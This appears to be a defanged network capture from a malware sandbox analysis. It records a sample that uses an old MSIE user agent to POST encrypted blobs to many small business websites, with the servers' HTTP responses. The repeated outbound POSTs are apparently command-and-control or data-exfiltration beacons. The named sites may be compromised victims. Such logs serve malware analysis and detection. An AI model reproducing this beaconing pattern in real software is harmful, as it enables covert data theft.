Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 468
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: alternative-aquitaine.co.uk
Connection: Keep-Alive
Cache-Control: no-cache

xl6BWAbHj3Rfo67HIXKe4Cm2EPlmYfghmtPVtE2 /GRAH2EEaQjgElHGOwcgpxvUUHYGpQzeJJzWotDEX5JQZ1/d0vJoJMLuVlltViCW9WqPnVfWef7 YR EQHlm76/JF3hCB6v sxvnwm3/MG9lxCPn01l2h0R/jiFoR6rouPy5BeS3uc5XhtNOmB0XIHWqh/N5lAXNZfe39pzcGLoOfK5S81TVhV4tZSfLXQjTAgavg1bq6u1hhEkumaXxsWC/ SaEHG71/hNZqOuwQCNjRVpAUkONtZuUIc6xP8ympfcqoL4ComrV21gPLkn7SEjTJk6VXHF  JbEDhpfkDqxro9UvZV 4ue2nRiXj9hNavrcw3NYDGYn5kcUEueflvvVJu tP5zrnN rZF10MOD plRkQOicFp2v9z4XFi tZv/tGMwfGROk87F9gfIhPtD3EYBO9JkQK50FarFDHCY=
HTTP/1.1 301 Moved Permanently
Date: Sat, 01 Jul 2017 11:17:06 GMT
Location: hXXp://VVV.alternative-aquitaine.co.uk/
Cache-Control: max-age=600
Expires: Sat, 01 Jul 2017 11:27:06 GMT
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
X-Varnish: 6851293
Age: 0
X-Cache: MISS
Transfer-Encoding: chunked
Connection: keep-alive
00f7..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<htm
l><head>.<title>301 Moved Permanently</title>.<
;/head><body>.<h1>Moved Permanently</h1>.<p>
;The document has moved <a href="hXXp://VVV.alternative-aquitaine.c
o.uk/">here</a>.</p>.</body></html>...0..HT
TP/1.1 301 Moved Permanently..Date: Sat, 01 Jul 2017 11:17:06 GMT..Loc
ation: hXXp://VVV.alternative-aquitaine.co.uk/..Cache-Control: max-age
=600..Expires: Sat, 01 Jul 2017 11:27:06 GMT..Content-Type: text/html;
charset=iso-8859-1..Vary: Accept-Encoding..X-Varnish: 6851293..Age: 0
..X-Cache: MISS..Transfer-Encoding: chunked..Connection: keep-alive..0
0f7..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html
><head>.<title>301 Moved Permanently</title>.<
/head><body>.<h1>Moved Permanently</h1>.<p>
The document has moved <a href="hXXp://VVV.alternative-aquitaine.co
.uk/">here</a>.</p>.</body></html>...0..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 524
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: chocolatecovers.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: mightymerchant=f4bg2ofp577eifcg7qtdjamlv1

U4LqwLedwXIsmOjJJt/5mwAJ145tgNU 22xyWpfvjNkhmXEKKv7R1PkWLDoZlcpSsnNOIZ/1vPuViVoLxxpKy8PvKYXq8GhESp3Mhoiaanz7Mdv/YYEPpHDMw9a4L2QeGhYwNuY0FFFz8xsp3Fd9yV0rfr8lZ8AFu4gBZ/ i0OGfCxMfbcxw/vzzfF3j57oy6V yi/bw4/pFHxzMhdaEwV5u/QCK/ufzP3J4hVvSNN/pIL7518UfUuLHIDD2s3yELuNh1WD743IoAwaQe 9 krYZXzBQ2i6cUN2hMDhLfPjlxg81b R9vLf9yaAWJGx/lWBP48a EBKALByCppROKlB7d7K u4UdzYdGmL/bGa3fM69M77ifJkUC79H/Y09QIgniJkMjvUUPnhWq8Ljfu5C9o6SVP 3nxtkcnHIowloGKP2bXsVis55HS4o8kvYMxTvZTZiLu9P8DcliXvBtNJUXr0a/6Q5HtuSOcoXLEzUs77vSzV/zSgIufgQ4fct9NL8iA3Ck2cs=
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:02 GMT
Server: Apache/2.2.15 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cc4_mighty=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=chocolatecovers.com
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
680d..<!DOCTYPE html>.<html lang="en">.<head>.  <
meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.
<meta charset="utf-8">. <!-- Title and other stuffs -->
. <title>ChocolateCovers - Custom Candy Bar Wrappers for any Oc
casion</title>. <meta name="viewport" content="width=device-
width, initial-scale=1.0">. <meta name="description" content="S
weeten any occasion with custom candy bar wrappers around Hershey bars
. Perfect for businesses, schools, weddings, showers, anniversaries,
holidays, reunions, and so much more!">. <meta name="keywords"
content="candy wrappers, Chocolate Covers, Custom Candy Bar Wrappers,
Custom Hershey Bar, Personalized Wrapper, Logo, Branded, Business,">
;. <meta name="author" content="MightyMerchant v5.1">. <lin
k rel="canonical" href="hXXp://VVV.chocolatecovers.com" />..<met
a property="og:title" content="ChocolateCovers - Custom Candy Bar Wrap
pers for any Occasion"/>..<meta property="og:site_name" content=
"ChocolateCovers LTD"/>..<meta property="og:url" content="http:/
/VVV.chocolatecovers.com/"/>..<meta property="og:description" co
ntent="Sweeten any occasion with custom candy bar wrappers around Hers
hey bars. Perfect for businesses, schools, weddings, showers, anniver
saries, holidays, reunions, and so much more!"/>..<meta property
="fb:admins" content="" />. <link href='hXXps://fonts.googlea
pis.com/css?family=Open Sans:400,400italic,600,600italic' rel='sty

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: servico-ind.com
Connection: Keep-Alive
Cache-Control: no-cache

z3VRs4fFx3HWquoWtsV25lARtoV9XEl1q6EsfDKpyDrpuRdI0er2GykkdruxDMRUgNvrd5qy7aGjQSjj7BQEGwC2/MyUjZVHwl 6xSpNJgmsA9IKBBAvWaiR/KMIVOGk7YxUvLXtU6NpYecxaKP t5Fj500mqEKHCX bCeTiRt5BdXO1dmczT6jpn5MYMFox wmZKw920RE9D2ZIVsqhE2N1DYqz6Xb1N/wY BCrBfoMpsR/i4CoFXiGFLmXDFfqqCAHwOhBsr 51Wih4lfgenigou6b55kqVV5P6suETHnKJ xUn9/jBEesHJ5dlBN33aZrdVw/Ut7jufDxV72Xo9XbokW3tcOIFjCBYrvHkZwYZchHw4 rX1rBTg TI3VUTV6C5Z5INBR1 Su9H6bDZ dKYLFf36fb8xEzqCbunCGcR6DoCYwZkil5lrvW2QhaSvr4DiDv29c/NZm9zUQObYDtG2gg5dKEHazAXDRFYeh7xgXVfsU10OxE
HTTP/1.1 503 Service Temporarily Unavailable
Server: nginx
Date: Sat, 01 Jul 2017 11:17:01 GMT
Content-Type: text/html
Content-Length: 608
Connection: keep-alive
<html>..<head><title>503 Service Temporarily Unavail
able</title></head>..<body bgcolor="white">..<cen
ter><h1>503 Service Temporarily Unavailable</h1></ce
nter>..<hr><center>nginx</center>..</body>.
.</html>..<!-- a padding to disable MSIE and Chrome friendly
error page -->..<!-- a padding to disable MSIE and Chrome friend
ly error page -->..<!-- a padding to disable MSIE and Chrome fri
endly error page -->..<!-- a padding to disable MSIE and Chrome
friendly error page -->..<!-- a padding to disable MSIE and Chro
me friendly error page -->..<!-- a padding to disable MSIE and C
hrome friendly error page -->..HTTP/1.1 503 Service Temporarily Una
vailable..Server: nginx..Date: Sat, 01 Jul 2017 11:17:01 GMT..Content-
Type: text/html..Content-Length: 608..Connection: keep-alive..<html
>..<head><title>503 Service Temporarily Unavailable<
/title></head>..<body bgcolor="white">..<center>&
lt;h1>503 Service Temporarily Unavailable</h1></center>
..<hr><center>nginx</center>..</body>..</ht
ml>..<!-- a padding to disable MSIE and Chrome friendly error pa
ge -->..<!-- a padding to disable MSIE and Chrome friendly error
page -->..<!-- a padding to disable MSIE and Chrome friendly er
ror page -->..<!-- a padding to disable MSIE and Chrome friendly
error page -->..<!-- a padding to disable MSIE and Chrome f

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ibcd.com.br
Connection: Keep-Alive
Cache-Control: no-cache

GfYaS39urXdgaMopXimrNAi9SzHVVEaTIybwo5LUJerbAh/ 69j7hxLZD9eoM6q5dIK7jnRVownAP/fAJqglbFRd8oUFYZmRIoue9ad6Mv17e hYk1TcZLZ1LyqYnhmoU5Fd2Gi3/mBIXcjzIgHeGRQrGUfunK5FyXPWTQMaNG1i4Zm3bFDqnlmFKAv7o5p9hVLXCT/1IH/9j8JFZqFYujwjyF4l5juXpTUT7rFPiQW2m3qFM0jA9 9XZ5V0R1PuRtKlVHkbhZIQ 2NeSzam zU 7RPasIeNLh6P80fdId4wslRv zx7nDaKNjRFGRNjlFeGKr81rbSWdShouRp9g4J5o7A1waB86EmCnPP5djm7NSO1jAJW/WHcOBFDgQ6izIetnI4I07TSQ/xdByTvKapFzfw9Bto 6zPqul kGA==
HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:17:08 GMT
Server: Apache
X-Powered-By: PHP/5.6.30
Retry-After: 3600
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ffnntm3dop481qkjjvt8vqok82; path=/
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2223..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="h
ttp://VVV.w3.org/1999/xhtml">..<head>.. <meta http-equi
v="Content-Type" content="text/html; charset=UTF-8" />.. <met
a name="description" content="Fa..a seu curso gr..tis e obtenha j.. o
seu certificado v..lido em todo o Brasil" />.. <meta name="vi
ewport" content="width=device-width, initial-scale=1.0">.. ..
<title>IBCD – Instituto Brasileiro de Cursos a Dist..ncia
</title>...... ...<!-- ########## CSS Files ##########
-->.. ....<!-- Framework CSS -->...<link rel="styleshe
et" href="hXXp://ibcd.com.br/wp-content/plugins/dpMaintenance/template
s/default/css/960.css" type="text/css" media="screen" />...<link
rel="stylesheet" href="hXXp://ibcd.com.br/wp-content/plugins/dpMainte
nance/templates/default/css/reset.css" type="text/css" media="screen"
/>...<!-- Screen CSS -->...<link type="text/css" href="htt
p://ibcd.com.br/wp-content/plugins/dpMaintenance/templates/default/the
mes/redmond/jquery-ui-1.8.17.custom.css" rel="stylesheet" />.. &
lt;link type="text/css" href="hXXp://ibcd.com.br/wp-content/plugins/dp
Maintenance/templates/default/css/prettyPhoto.css" rel="stylesheet" /&
gt;.. <link rel="stylesheet" href="hXXp://ibcd.com.br/wp-content
/plugins/dpMaintenance/templates/default/css/style.css" type="text/css
" media="screen" />.. ...<!-- For progressively larger di

<<< skipped >>>

GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBR6EHhJ4XUaQA4N26wwyKpLEnXRrAQULNVQQZcVi/CPNmFbSvtr2ZnJM5ICEG6KkOvP8ESKcg0IBdCCpUQ= HTTP/1.1
Cache-Control: max-age = 600466
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sat, 01 Jul 2017 10:02:23 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: g2.symcb.com


HTTP/1.1 304 Not Modified
Content-Type: application/ocsp-response
Expires: Sat, 8 Jul 2017 10:02:23 GMT
Last-Modified: Sat, 1 Jul 2017 10:02:23 GMT
Cache-Control: max-age=600491, public, no-transform, must-revalidate
Date: Sat, 01 Jul 2017 11:16:56 GMT
Connection: keep-alive
HTTP/1.1 304 Not Modified..Content-Type: application/ocsp-response..Ex
pires: Sat, 8 Jul 2017 10:02:23 GMT..Last-Modified: Sat, 1 Jul 2017 10
:02:23 GMT..Cache-Control: max-age=600491, public, no-transform, must-
revalidate..Date: Sat, 01 Jul 2017 11:16:56 GMT..Connection: keep-aliv
e..


POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 504
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: jacksonsallamerican.com
Connection: Keep-Alive
Cache-Control: no-cache

nxF0tPYignSMuEyfUb3 apmnmbUWhA7Zir6BQhcvENTF702R3/fVpXyyTtgUoNiDMbWrrrMTaerC8oTh22jKHFKVF6oGQnGEC8yB0epJ6pUTNfwyE4X67D 2VVrCyW/oyIcF4jNstIp5MoCFlSYt4H35YlBk1MFPpgwB2ogHUIqwrMKX4rBv5PdwpKTBlUNbMGbj6dgsTztRs8gm86 7WxJVkZa7LQGW7kYyFsS2PzTEHLr0hCcy5mfOb0KMV0aAMGzJ y3eoQa0hAJoMdaAF0X5XNBr5yFyuugfF04VBJH8M6p9lUo72hvEoGH4NE5QJmtGOsE8v0kd48e/KHbfju0Qs6tjeBxpuKLfUalXbXxhH4yn3abfhlQCu0mgEl2SXbu5QOvngZm1o3CtO7NbOqfP1rVAG/cEw 8VDGzRPlRgYpnGms6ONrWT0rzYuYTrDAN/qG0Eev/BR4RvsINrWkio0btf3sTnHxmZSvHIkq6f5PWsHNzRYE8=
HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Sat, 01 Jul 2017 11:17:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: W3 Total Cache/0.9.4.1
X-Pingback: hXXp://jacksonsallamerican.com/xmlrpc.php
P3P: CP="NOI"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Link: <hXXp://jacksonsallamerican.com/wp-json/>; rel="hXXps://api.w.org/", <hXXp://jacksonsallamerican.com/>; rel=shortlink
Set-Cookie: PHPSESSID=ur1rdkkag74bq2ebnt71merds0; path=/
Vary: Accept-Encoding,User-Agent
a8a0..<!doctype html>  ..<!--[if lt IE 7 ]> <html lang=
"en-US" class="no-js ie6"> <![endif]-->..<!--[if IE 7 ]>
; <html lang="en-US" class="no-js ie7"> <![endif]-->..&
lt;!--[if IE 8 ]> <html lang="en-US" class="no-js ie8"> &l
t;![endif]-->..<!--[if IE 9 ]> <html lang="en-US" class
="no-js ie9"> <![endif]-->..<!--[if (gt IE 9)|!(IE)]>&l
t;!--> <html class="no-js" lang="en-US"> <!--<![endif]-
->..<head>..<script src='hXXps://cf.chownowcdn.com/latest/
static/integrations/ordering-modal.min.js' ..data-chownow-company-id='
3485'></script>.. <meta charset="UTF-8" />.. <
meta http-equiv="content-type" content="text/html; charset=utf-8" />
;.. <meta name="author" content="Grand Pixels, VVV.grandpixels.c
om" />.. <meta name="viewport" content="width=device-width, i
nitial-scale=1.0">.. .. <meta name="keywords" content=
"" />.. .. <meta name="description" content="" /&g
t;.. .. <link rel="alternate" type="text/xml" title="RSS
.92" href="hXXp://jacksonsallamerican.com/feed/rss/" />.. <li
nk rel="alternate" type="application/atom xml" title="Atom 0.3" href="
hXXp://jacksonsallamerican.com/feed/atom/" />.. <link rel="pi
ngback" href="hXXp://jacksonsallamerican.com/xmlrpc.php" />.. &l
t;link rel="stylesheet" href="hXXp://jacksonsallamerican.com/wp-conten
t/themes/linguini/style.css" type="text/css" media="screen" />.

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 428
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: areafor.com
Connection: Keep-Alive
Cache-Control: no-cache

l0zLS 7mrnN2rrHF YGRWVEm1GZuw3yHAkboh7jO0v4z/ouwbtR0Y6ngB4j8nUlDA2aJVuaH86PJirukYfxK4sT/inNqvkKgwNVmXoDqoxgwBFrA9tdrqZ9MW8qzTJhTNI1TDBT3At55AYsIR6VG RYH3PO0T/sDAbuJJGEhRfngiGR1wE2OsOEVy5HP0lfnCIMpBL6ADecUg77cct0qExnKxBfcGDYu4zPQvNiy7R6OymlKOh7YtLMXrGGOsp3aWzYojHAzh4 1dw6Vac7j8VQfmf7U6kt6aOyO7sUOMr/ZDddHRrtRpAw6rxEvia1JUg7Y QPUun4lKZdFLXA8fBC/UPa4pEPoU5oHd5o0a 0Vw9SQ vLmJbFwQ0PEmjJuBf16QHOJFuAvxHv5wJKl5zqsJU8TJL5Wgun1EK8oTw==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.6.30
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
243d..<!DOCTYPE html>.<!--[if IE 8]>...<html class="ie 
ie8"> <![endif]-->.<!--[if IE 9]>...<html class="ie
ie9"> <![endif]-->.<!--[if gt IE 9]><!-->.<htm
l> <!--<![endif]-->.<head>..<meta charset="UTF-8"
>..<title>Area-Escuela de Diseño y nuevas tecnologias-
San Sebastian</title>..<meta name="keywords" content="Area -
Escuela de Dise..o y Nuevas Tecnolog..as, Desarrollo web, Community Ma
nager, cursos subvencionados, Donostia-San Sebasti..n" />..<meta
name="description" content="Formaci..n en Dise..o y Nuevas tecnolog..
as en Donostia. Impartimos Masters, cursos modulares, formacion subven
cionada, formacion a medida para empresas..." />...<!-- mobile s
ettings -->..<meta name="viewport" content="width=device-width,
maximum-scale=1, initial-scale=1, user-scalable=0" />...<!-- Fav
icon -->..<link rel="shortcut icon" href="img/favicon.ico" />
...<!-- WEB FONTS -->..<link href="hXXps://fonts.googleapis.c
om/css?family=Open Sans:300,400,700,800&subset=latin,latin-ext" re
l="stylesheet" type="text/css" />...<!-- CORE CSS -->..<li
nk href="assets/plugins/bootstrap/css/bootstrap.min.css" rel="styleshe
et" type="text/css" />..<link href="assets/css/font-awesome.css"
rel="stylesheet" type="text/css" />..<link href="assets/css/sky
-forms.css" rel="stylesheet" type="text/css" />..<link href="ass
ets/css/weather-icons.min.css" rel="stylesheet" type="text/css" /&

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 452
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: sspackaginggroup.com
Connection: Keep-Alive
Cache-Control: no-cache

ssV2SrzQil4HijlJZ3QCu0 HFyFUpFtOsJXPvmriWmj2dZH6xWwtyKo8V1eJn/HI7ZiKI0HRa/ Jhi2N/hruq2HeAcP67xaAU8pbKmdU9fhotLKNBWVI EBbvdGZFqdr3YmQvifrMdWx6BnB2RYmaEu0rBswoIyirhxbdM04bvRaYQiw Husgv2fWjyWz4jpeqJ0mJ4TfxsKuRvbpKrwXQmkdoDhtFNXuXcdEyjzgrhQEqcUJdm7icvY35xqte4zyiqYH1ATh43j0vl GieEuD7qpF2w7RazcH/wqyMBWyLO5XYizlbk/cGIHDz1Ip2b6coSQhMW35bMk7xs5j kfRgxLxvRmwFfOKk4icdT /RqVWJ6SOsPbyWeWvU1YnrkQpmffZjPN9PNZL8fS648aO1djqckM2sLX1hMl3KLw CXeIh5TyowDF7L/D5xdsVOAOXv
HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Sat, 01 Jul 2017 11:16:38 GMT
Content-Length: 1293
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=iso-8859-1"/>..<title>405
- HTTP verb used to access this page is not allowed.</title>..&l
t;style type="text/css">..<!--..body{margin:0;font-size:.7em;fon
t-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..f
ieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color
:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.
2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0
0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-ser
if;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;p
osition:relative;}...content-container{background:#FFF;width:96%;margi
n-top:8px;padding:10px;position:relative;}..-->..</style>..&l
t;/head>..<body>..<div id="header"><h1>Server Err
or</h1></div>..<div id="content">.. <div class="c
ontent-container"><fieldset>.. <h2>405 - HTTP verb use
d to access this page is not allowed.</h2>.. <h3>The page
you are looking for cannot be displayed because an invalid method (HT
TP verb) was used to attempt access.</h3>.. </fieldset><
;/div>..</div>..</body>..</html>....

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 448
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: chocolatecovers.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: mightymerchant=f4bg2ofp577eifcg7qtdjamlv1

MksJ8MWuHYEpE72U7FHQrz5XzxyTCRSiybeaHS5CLHTK/UJPYISAHcfACbMSBaqW2Y82/S5RoDTMnV XOnD0me7gZ5t75zjFxhWrSg9bL05i1v3mmINW1E6i5zYD1k3DnUdjvjWFxny3rVTeL1FRFq81EbPNQ8Hl517yXqTL4aA7RqS3BVdodlFw2Pa01axr0LIzq/wT7SLsYEYxLbAEeaXSUP/ZYJ2x TBdnGZrSd1ox MtW hJKNsbUENXcZ0mjPMXbXVjjGg1gwvmHfSoPEZJUZzuxODxxMMEuE0JiIhvutY3C0lPawjz3oCxlcHrG/kSe/WaAPVRf8iSP7FgKxXInlXYrdKCRTuXaIp3Qhw1a7ln32d4UjQlmc5tVrPZqPkJYk78gpd4ysAD8K66slmrinam6DQ/iby9pm7k97VOpS/VAE0i3PnZE3n9YQ==
HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:17:19 GMT
Server: Apache/2.2.15 (Red Hat)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cc4_mighty=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=chocolatecovers.com
Vary: Accept-Encoding
Keep-Alive: timeout=3, max=1000
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
680d..<!DOCTYPE html>.<html lang="en">.<head>.  <
meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.
<meta charset="utf-8">. <!-- Title and other stuffs -->
. <title>ChocolateCovers - Custom Candy Bar Wrappers for any Oc
casion</title>. <meta name="viewport" content="width=device-
width, initial-scale=1.0">. <meta name="description" content="S
weeten any occasion with custom candy bar wrappers around Hershey bars
. Perfect for businesses, schools, weddings, showers, anniversaries,
holidays, reunions, and so much more!">. <meta name="keywords"
content="candy wrappers, Chocolate Covers, Custom Candy Bar Wrappers,
Custom Hershey Bar, Personalized Wrapper, Logo, Branded, Business,">
;. <meta name="author" content="MightyMerchant v5.1">. <lin
k rel="canonical" href="hXXp://VVV.chocolatecovers.com" />..<met
a property="og:title" content="ChocolateCovers - Custom Candy Bar Wrap
pers for any Occasion"/>..<meta property="og:site_name" content=
"ChocolateCovers LTD"/>..<meta property="og:url" content="http:/
/VVV.chocolatecovers.com/"/>..<meta property="og:description" co
ntent="Sweeten any occasion with custom candy bar wrappers around Hers
hey bars. Perfect for businesses, schools, weddings, showers, anniver
saries, holidays, reunions, and so much more!"/>..<meta property
="fb:admins" content="" />. <link href='hXXps://fonts.googlea
pis.com/css?family=Open Sans:400,400italic,600,600italic' rel='sty

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: __cfduid=d0fbd217b34d0e5411957c2c9e234607e1498907805
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.solutioncorp.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Sat, 01 Jul 2017 11:16:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.30
Set-Cookie: wfvt_649023067=595784376681c; expires=Sat, 01-Jul-2017 11:45:03 GMT; Max-Age=1800; path=/; httponly
Link: <hXXp://VVV.solutioncorp.com/wp-json/>; rel="hXXps://api.w.org/"
Link: <hXXp://VVV.solutioncorp.com/>; rel=shortlink
Vary: Accept-Encoding
X-Mod-Pagespeed: 1.12.34.1-0
Cache-Control: max-age=0, no-cache
Server: cloudflare-nginx
CF-RAY: 3778f47c370f822b-KBP
4f32..<!DOCTYPE html>.<html lang="en-US">.<head>.<
;meta charset="UTF-8">.<meta name="viewport" content="width=devi
ce-width, initial-scale=1, maximum-scale=1">.<link rel="profile"
href="hXXp://gmpg.org/xfn/11">.<link rel="pingback" href="http:
//VVV.solutioncorp.com/xmlrpc.php">.<style type="text/css" id="c
ws-custom-fonts-css">.main-nav-container .menu-item a,.main-nav-con
tainer .menu-item .button_open,.mobile_menu_header{font-family:Lato;fo
nt-weight:400;font-size:16px;line-height:34px;color:#595959;}.main-men
u .search_menu{font-size:16px;}.ce_title,.comments-area .comment-reply
-title,.the8-new-layout .cws-widget .widget-title,.woocommerce div[cla
ss^="post-"] h1.product_title.entry-title{font-family:Open Sans;font-w
eight:700;text-transform:capitalize;font-size:40px;line-height:40px;co
lor:#595959;}.testimonial .author figcaption,.testimonial .quote .quot
e_link:hover,.news .post_tags>*,.news .post_categories>*,.pagina
tion a,.widget-title,a:hover,.ce_toggle.alt .accordion_title:hover,.cw
s_portfolio_items .item .title_part,.pricing_table_column .price_secti
on,.cws_callout .callout_title,.comments-area .comments_title,.comment
s-area .comment-meta,.comments-area .comment-reply-title,.comments-are
a .comment-respond .comment-form input:not([type='submit']),.comments-
area .comment-respond .comment-form textarea,.page_title .bread-crumbs
,.benefits_container .cws_textwidget_content .link a:hover,.cws_portfo
lio_fw .title,.cws_portfolio_fw .cats a:hover,.ourteam_item_wrappe

<<< skipped >>>

GET / HTTP/1.1
Accept: */*
Accept-Language: en-us
Cookie: __cfduid=d5cb14ea9569a874c825f4bdff9074e8c1498907802
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: VVV.istanbultarim.com.tr
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 503 Service Temporarily Unavailable
Date: Sat, 01 Jul 2017 11:16:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Cache-Control: no-cache
Server: cloudflare-nginx
CF-RAY: 3778f46930a183fa-KBP
1170..<!DOCTYPE HTML>.<html lang="en-US">.<head>.  &
lt;meta charset="UTF-8" />. <meta http-equiv="Content-Type" con
tent="text/html; charset=UTF-8" />. <meta http-equiv="X-UA-Comp
atible" content="IE=Edge,chrome=1" />. <meta name="robots" cont
ent="noindex, nofollow" />. <meta name="viewport" content="widt
h=device-width, initial-scale=1, maximum-scale=1" />. <title>
;Just a moment...</title>. <style type="text/css">. ht
ml, body {width: 100%; height: 100%; margin: 0; padding: 0;}. body
{background-color: #ffffff; font-family: Helvetica, Arial, sans-serif;
font-size: 100%;}. h1 {font-size: 1.5em; color: #404040; text-alig
n: center;}. p {font-size: 1em; color: #404040; text-align: center;
margin: 10px 0 0 0;}. #spinner {margin: 0 auto 30px auto; display:
block;}. .attribution {margin-top: 20px;}. @-webkit-keyframes b
ubbles { 33%: { -webkit-transform: translateY(10px); transform: transl
ateY(10px); } 66% { -webkit-transform: translateY(-10px); transform: t
ranslateY(-10px); } 100% { -webkit-transform: translateY(0); transform
: translateY(0); } }. @keyframes bubbles { 33%: { -webkit-transform
: translateY(10px); transform: translateY(10px); } 66% { -webkit-trans
form: translateY(-10px); transform: translateY(-10px); } 100% { -webki
t-transform: translateY(0); transform: translateY(0); } }. .bubbles
{ background-color: #404040; width:15px; height: 15px; margin:2px; bo
rder-radius:100%; -webkit-animation:bubbles 0.6s 0.07s infinite ea

<<< skipped >>>

POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 508
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: cksglobal.net
Connection: Keep-Alive
Cache-Control: no-cache

